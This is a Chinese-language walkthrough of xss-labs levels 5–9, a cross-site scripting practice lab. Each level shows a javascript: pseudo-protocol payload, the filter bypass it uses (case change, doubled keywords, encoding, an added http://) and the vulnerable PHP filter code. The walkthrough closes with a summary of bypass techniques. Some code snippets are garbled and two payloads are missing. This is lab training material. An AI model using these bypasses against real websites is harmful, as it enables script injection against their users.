xss-labs靶场训练（5-9关）

第五关

先试一下经典的payload：

这里把script过滤了

onclick也被过滤了

onmouseover也同样被过滤了，尝试用标签执行javascript:伪协议。
Payload：

”><a href=javascript:alert()>xss</a>`

点击一下搜索按钮左侧的xss就成功弹窗了

后台关键代码：

 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace(",",$str);
$str3=str_replace("on","o_n",$str2);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.$str3.'">


';
?>

这里用了主要用了strtolower函数把所有字符转换为小写，加上str_replace函数把script和on替换掉。所以包含script、onclick、onmouseover的payload都不能用了。

第六关

尝试第五关的方法：

这里把href也替换掉了，那就用img试试看吧

src也被替换掉了，感觉这些字符都被替换了，只能尝试一下大小写绕过了
payload：

”><a Href=javascript:alert()>xss</a>

成功绕过

后台关键代码：

 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(",",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.$str6.'">


';
?>

这里把script、on、src、data、href都过滤掉了，但没有像第五关那样把字母都转化成小写，所以大小写可以成功绕过。

第七关

老规矩，先用上一关的payload做试探

这里直接把href和script替换成空字符了，而且把我的大写字母转化成小写了。试一下双写绕过：

”><a hrhrefef=javascrscriptipt:alert()>xss</a>

成功绕过

后台关键代码：

 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.$str6.'">


';
?>

这里把字母都转化成小写，而且把script、on、src、data、href都替换成空字符了，利用关键字双写能成功绕过。

第八关

先用上一关的payload测试

这里没有把关键字替换成空字符，所以不用双写，把payload换成：javascript:alert(xss)

还是对关键字做了替换，而且大小写转换失败。

尝试一下编码绕过：


成功绕过

后台关键代码：

 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '

.htmlspecialchars($str).'">


';
?>

 echo '
.$str7.'">友情链接';
?>

这里把script、on、src、data、href都过滤掉了，而且把字母都转化成小写，所以大小写绕过无效了。但利用编码绕过可以成功弹窗。

第九关

先试一下上一关的payload：javascript:alert()

直接识别我的链接不合法了，估计是URL格式不合法，尝试把http://添加进payload：

成功绕过

后台关键代码：

 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '

.htmlspecialchars($str).'">


';
?>

if(false===strpos($str7,'http://'))
{
  echo '
友情链接';
        }
else
{
  echo '
.$str7.'">友情链接';
}
?>

这里在对关键字符过滤以及把字符转化成小写的情况下，加多了一个strpos函数，用来判断链接是否包含http://

strpos函数实例：

总结

• 某些关键字被过滤时，可以考虑构造其他payload。
• 大部分关键字都被过滤时，考虑用大小写关键字绕过。
• 关键字被过滤而且字符都被转换成小写字母时，考虑用编码绕过。
• 关键字被替换成空字符时，考虑用双写关键字绕过。
• 输入的payload被判断是否有某些字符时，考虑以注释的形式添加到payload。